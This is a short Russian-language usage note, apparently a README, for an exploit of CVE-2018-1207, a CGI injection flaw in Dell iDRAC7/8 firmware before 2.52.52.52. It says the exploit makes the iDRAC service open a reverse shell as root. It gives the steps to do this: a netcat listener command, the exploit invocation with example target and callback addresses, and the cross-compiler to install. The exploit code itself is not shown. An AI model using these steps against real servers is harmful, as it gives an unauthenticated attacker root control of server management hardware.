
Exploit iDRAC 7 & 8 firmware < 2.52.52.52
Эксплойт iDRAC 7 & 8 прошивка < 2.52.52.52
Dell EMC iDRAC7/iDRAC8, версии до 2.52.52.52, содержат уязвимость внедрения CGI, которая может быть использована для удаленного выполнения кода. Удаленный неавторизованный злоумышленник потенциально может использовать переменные CGI для выполнения удаленного кода.
Этот код должен заставить службу iDRAC открыть обратную оболочку от имени пользователя root.
Запустите локальный слушатель: nc -v -l -p local_port
nc -v -l -p 5500
Запустите эксплойт: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
Вам необходимо установить версию sh4-linux-gnu-gcc, в настоящее время это sh4-linux-gnu-gcc-11
Вы можете установить её с помощью apt install gcc-11-sh4-linux-gnu